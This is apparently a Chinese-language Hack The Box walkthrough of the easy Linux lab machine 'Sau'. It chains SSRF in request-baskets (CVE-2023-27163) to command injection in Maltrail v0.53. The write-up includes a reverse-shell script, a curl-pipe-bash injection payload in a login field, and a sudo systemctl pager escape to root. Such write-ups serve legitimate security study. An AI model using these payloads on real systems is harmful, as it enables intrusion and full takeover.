Sua

Administrator

2023-07-25

HTB Linux

Machine：Linux

Level：easy

信息收集

Nmap

 ┌──(root㉿kali)-[~]
 └─# nmap -sV -sC 10.10.11.224 
 Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-23 20:39 EDT
 Nmap scan report for 10.10.11.224
 Host is up (0.14s latency).
 Not shown: 997 closed tcp ports (reset)
 PORT      STATE    SERVICE VERSION
 22/tcp    open     ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
 | ssh-hostkey: 
 |   3072 aa:88:67:d7:13:3d:08:3a:8a:ce:9d:c4:dd:f3:e1:ed (RSA)
 |   256 ec:2e:b1:05:87:2a:0c:7d:b1:49:87:64:95:dc:8a:21 (ECDSA)
 |_  256 b3:0c:47:fb:a2:f2:12:cc:ce:0b:58:82:0e:50:43:36 (ED25519)
 80/tcp    filtered http
 55555/tcp open     unknown
 | fingerprint-strings: 
 |   FourOhFourRequest: 
 |     HTTP/1.0 400 Bad Request
 |     Content-Type: text/plain; charset=utf-8
 |     X-Content-Type-Options: nosniff
 |     Date: Mon, 24 Jul 2023 00:41:10 GMT
 |     Content-Length: 75
 |     invalid basket name; the name does not match pattern: ^[wd-_\.]{1,250}$
 |   GenericLines, Help, Kerberos, LDAPSearchReq, LPDString, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie: 
 |     HTTP/1.1 400 Bad Request
 |     Content-Type: text/plain; charset=utf-8
 |     Connection: close
 |     Request
 |   GetRequest: 
 |     HTTP/1.0 302 Found
 |     Content-Type: text/html; charset=utf-8
 |     Location: /web
 |     Date: Mon, 24 Jul 2023 00:40:39 GMT
 |     Content-Length: 27
 |     href="/web">Found</a>.
 |   HTTPOptions: 
 |     HTTP/1.0 200 OK
 |     Allow: GET, OPTIONS
 |     Date: Mon, 24 Jul 2023 00:40:41 GMT
 |_    Content-Length: 0
 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
 SF-Port55555-TCP:V=7.94%I=7%D=7/23%Time=64BDC888%P=x86_64-pc-linux-gnu%r(G
 SF:etRequest,A2,"HTTP/1\.0\x20302\x20Found\r\nContent-Type:\x20text/html;\
 SF:x20charset=utf-8\r\nLocation:\x20/web\r\nDate:\x20Mon,\x2024\x20Jul\x20
 SF:2023\x2000:40:39\x20GMT\r\nContent-Length:\x2027\r\n\r\n<a\x20href=\"/w
 SF:eb\">Found</a>\.\n\n")%r(GenericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Re
 SF:quest\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x
 SF:20close\r\n\r\n400\x20Bad\x20Request")%r(HTTPOptions,60,"HTTP/1\.0\x202
 SF:00\x20OK\r\nAllow:\x20GET,\x20OPTIONS\r\nDate:\x20Mon,\x2024\x20Jul\x20
 SF:2023\x2000:40:41\x20GMT\r\nContent-Length:\x200\r\n\r\n")%r(RTSPRequest
 SF:,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;
 SF:\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request"
 SF:)%r(Help,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20tex
 SF:t/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20
 SF:Request")%r(SSLSessionReq,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nCon
 SF:tent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\
 SF:r\n400\x20Bad\x20Request")%r(TerminalServerCookie,67,"HTTP/1\.1\x20400\
 SF:x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nC
 SF:onnection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(TLSSessionReq,67,"
 SF:HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20c
 SF:harset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(K
 SF:erberos,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text
 SF:/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20R
 SF:equest")%r(FourOhFourRequest,EA,"HTTP/1\.0\x20400\x20Bad\x20Request\r\n
 SF:Content-Type:\x20text/plain;\x20charset=utf-8\r\nX-Content-Type-Options
 SF::\x20nosniff\r\nDate:\x20Mon,\x2024\x20Jul\x202023\x2000:41:10\x20GMT\r
 SF:\nContent-Length:\x2075\r\n\r\ninvalid\x20basket\x20name;\x20the\x20nam
 SF:e\x20does\x20not\x20match\x20pattern:\x20\^\[\\w\\d\\-_\\\.\]{1,250}\$\
 SF:n")%r(LPDString,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:
 SF:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20
 SF:Bad\x20Request")%r(LDAPSearchReq,67,"HTTP/1\.1\x20400\x20Bad\x20Request
 SF:\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20clo
 SF:se\r\n\r\n400\x20Bad\x20Request");
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
 
 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
 Nmap done: 1 IP address (1 host up) scanned in 145.31 seconds

手工验证信息

5555

网页显示Powered by request-baskets | Version: 1.2.1

此版本存在CVE-2023-27163

漏洞利用

漏洞利用：https://notes.sjtu.edu.cn/s/MUUhEymt7#

request baskets服务存在api接口/api/baskets/{name}，/baskets/{name}，这里的name可以任意，这些接口会接收一个forward_url参数，而这个参数存在SSRF漏洞。
向/api/baskets/{name}发送forward_url参数后，需要访问10.10.11.224:55555/{name}来触发SSRF漏洞（请求给定的forward_url）。
可以实现55555端口访问其他端口内容的效果（如直接访问80端口被拦截，但是通过这个SSRF漏洞，让靶机主机访问80端口，再把内容显示在55555端口）。

创建新用户bp抓包并将forward_url更改为127.0.0.1:80

Request

 POST /api/baskets/king HTTP/1.1
 Host: 10.10.11.224:55555
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
 Accept-Encoding: gzip, deflate
 DNT: 1
 Connection: close
 Upgrade-Insecure-Requests: 1
 Content-Length: 142
 
 {
   "forward_url": "http://127.0.0.1:80/",
   "proxy_response": true,
   "insecure_tls": false,
   "expand_path": true,
   "capacity": 250
 }

forward_url是请求的url，因为不知道80端口的网站具体有什么内容，所以是路径直接是/。
proxy_response设置为true，应该是控制是否将请求的url内容转发过来。

Response

 HTTP/1.1 201 Created
 Content-Type: application/json; charset=UTF-8
 Date: Tue, 25 Jul 2023 06:32:17 GMT
 Content-Length: 56
 Connection: close
 
 {"token":"YPGwqVs7XJla4mbsl29qsu4GCyUd3nm6iZ0wXVy_M4Om"}

访问10.10.11.224:55555/king便可以访问80，在界面中发现Powered by Maltrail (v0.53)，经过搜索发现RCE，我们需要再注册一个账号用来访问login网页

Request

 POST /api/baskets/empress HTTP/1.1
 Host: 10.10.11.224:55555
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
 Accept-Encoding: gzip, deflate
 DNT: 1
 Connection: close
 Upgrade-Insecure-Requests: 1
 Content-Length: 147
 
 {
   "forward_url": "http://127.0.0.1:80/login",
   "proxy_response": true,
   "insecure_tls": false,
   "expand_path": true,
   "capacity": 250
 }

Response

 HTTP/1.1 201 Created
 Content-Type: application/json; charset=UTF-8
 Date: Tue, 25 Jul 2023 06:32:46 GMT
 Content-Length: 56
 Connection: close
 
 {"token":"pu0ZpTiIGZHyv1Z0QIW8UKQNTjsLIQgyISKp3yzi_O3i"}

反弹shell

创建一个shell.sh

 bash -i >& /dev/tcp/10.10.14.33/1234 0>&1

开启http服务，当前目录就是web根目录

 python3 -m http.server 80

本机监听1234端口

访问网站

 POST /empress HTTP/1.1
 Host: 10.10.11.224:55555
 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
 Accept-Encoding: gzip, deflate
 Connection: close
 Upgrade-Insecure-Requests: 1
 Content-Type: application/x-www-form-urlencoded
 
 username=;`curl 10.10.14.33/shell.sh|bash`

 ┌──(root㉿kali)-[~]
 └─# nc -lnvp 1234
 listening on [any] 1234 ...
 connect to [10.10.14.33] from (UNKNOWN) [10.10.11.224] 56186
 bash: cannot set terminal process group (890): Inappropriate ioctl for device
 bash: no job control in this shell
 puma@sau:/opt/maltrail$ ls

权限提升

 puma@sau:/opt/maltrail$ sudo -l
 Matching Defaults entries for puma on sau:
     env_reset, mail_badpass,
     secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
 
 User puma may run the following commands on sau:
     (ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service

 puma@sau:/$ script /dev/null /bin/bash
 script /dev/null /bin/bash
 Script started, file is /dev/null
 puma@sau:/$ sudo /usr/bin/systemctl status trail.service
 sudo /usr/bin/systemctl status trail.service
 WARNING: terminal is not fully functional
 -  (press RETURN)!sh
 !sshh!sh
 # whoami
 root